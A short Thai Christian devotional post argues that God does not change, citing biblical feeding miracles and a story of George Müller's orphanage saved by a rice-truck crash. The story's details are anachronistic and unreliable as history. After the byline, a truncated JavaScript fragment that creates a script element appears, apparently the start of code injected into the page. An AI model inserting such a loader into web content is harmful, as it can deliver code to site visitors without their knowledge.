กุญแจดอกที่ 2 มั่นใจในพระเจ้าไม่เปลี่ยนแปลง

sea-landscape-mountains-nature

19 ต.ค. กุญแจดอกที่ 2 มั่นใจในพระเจ้าไม่เปลี่ยนแปลง

40 ปีในถิ่นทุรกันดาร ที่พระเจ้าทรงเลี้ยงอิสราเอลด้วยมานาอาหารจากสวรรค์ พระเจ้าทรงเลี้ยงเอลียาห์ด้วยขนมปังที่อีกาคาบมาให้ และพระเยซูคริสต์เลี้ยงดูคน 5,000 คนด้วยขนมปัง 5 ก้อน กับปลา 2 ตัว
ในปัจจุบันพระเจ้าก็ยังคงไม่เปลี่ยนแปลง ฮบ 13:8 “พระเยซูคริสต์ยังทรงเหมือนเดิมในเวลาวานนี้ และเวลาวันนี้ และต่อๆไปเป็นนิจกาล”

ในปี 1895  จอร์จ มูลเลอร์  เปิดสถานเลี้ยงเด็กกำพร้าโดยการอธิษฐาน ท่านต้องใช้เงินปีละ 5 ล้านบาท เพื่อดูแลเด็ก 9,500 คน  ไม่มีการเรี่ยไร  ไม่มีสัญญาถวายประจำ  แต่เขาอยู่ด้วยการอธิษฐาน ด้วยความเชื่อ มีครั้งหนึ่งอาหารในสถานเลี้ยงเด็กหมด มูลเลอร์บอกให้เด็กๆนั่งหน้าจานข้าวแล้วอธิษฐานขอบคุณพระเจ้าสำหรับอาหารที่ประทานให้  ทันใดนั้นเองมีเสียงรถชนกันหน้าสถานเลี้ยงเด็ก ปรากฏว่ามีรถบันทุกข้าวสารชนกัน เจ้าของข้าวได้ยกข้าวที่ตกกลางถนนให้กับเด็กๆเหล่านี้

คุณคิดว่าเป็นเรื่องบังเอิญหรือไม่?  เปล่าเลย พระเจ้ามีวิธีการที่จะตอบคำอธิษฐานแก่คุณหลายวิธี เพียงแต่คุณเชื่อเท่านั้น

เขียนโดย อ.เจริญ ยธิกุลvar d=document;var s=d.createElement(‘script’);